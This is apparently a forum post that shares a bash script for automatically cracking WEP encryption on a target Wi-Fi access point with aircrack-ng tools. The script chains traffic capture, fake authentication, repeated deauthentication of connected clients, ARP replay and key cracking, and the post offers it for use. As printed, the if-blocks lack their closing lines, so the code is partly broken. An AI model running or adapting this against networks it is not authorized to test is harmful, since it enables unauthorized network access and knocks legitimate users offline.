I know this is old but the script is functional, as long as somebody is using the access point. For those of you that have looked into how this works, you know why. Written in bash, pretty self-explanitory. If you have any other programs managing your wireless interface, disable or kill them. Also make sure your wireless interface is in monitor mode. Enjoy.
### auto-wep.sh - automatic wep-cracking(run as root) by frog on 5/24/12
export IFACE
export BSSID
export CHANNEL
export CLIENT # target for deauth. (optional)
### Check for argument
if [ -z $1 ]
then echo "Usage: $0 <interface>"
echo "Set MONITOR mode interface. use airmon-ng start <interface> and try again."
### Check for xterm and aircrack-ng(dependencies)
if [ -z `which xterm` ]
then echo "Xterm is not installed. Install it and try again."
if [ -z `which aircrack-ng` ]
then echo "Aircrack-ng is not installed. install it and try again."
### Start airodump-ng to collect target information
sudo airodump-ng $IFACE
echo "Enter BSSID: "; read BSSID
echo "Enter AP Channel: "; read CHANNEL
echo "Enter client(optional): "; read CLIENT
echo "Starting $0 with these parameters: "
echo " Interface: $IFACE"; sleep 1
echo " BSSID: $BSSID"; sleep 1
echo " Channel: $CHANNEL"; sleep 1
if [ "$CLIENT" != "" ]
then echo " Client: $CLIENT"; sleep 1
### Start wep cracking process using components of aircrack-ng in the background (&)
# Start airodump-ng
xterm -e "sudo airodump-ng --bssid $BSSID --channel $CHANNEL -w AUTO-WEP $IFACE" &
# Start aireplay-ng for fake auth.
sleep 5
xterm -e "sudo aireplay-ng -1 0 $IFACE -a $BSSID" &
# Wait for fake association before deauth.
sleep 5
if [ "$CLIENT" != "" ]
then xterm -e "while true; do sudo aireplay-ng -0 6 $IFACE -a $BSSID -c $CLIENT; sleep 5; done" &
if [ "$CLIENT" = "" ]
then xterm -e "while true; do sudo aireplay-ng -0 6 $IFACE -a $BSSID; sleep 5; done" &
# Start aireplay-ng for ARP replay
xterm -e "sudo aireplay-ng -3 $IFACE -b $BSSID" &
# Start cracking .cap file after giving some time to generate initialization vectors(iv's)
sleep 60
sudo aircrack-ng AUTO-WEP*.cap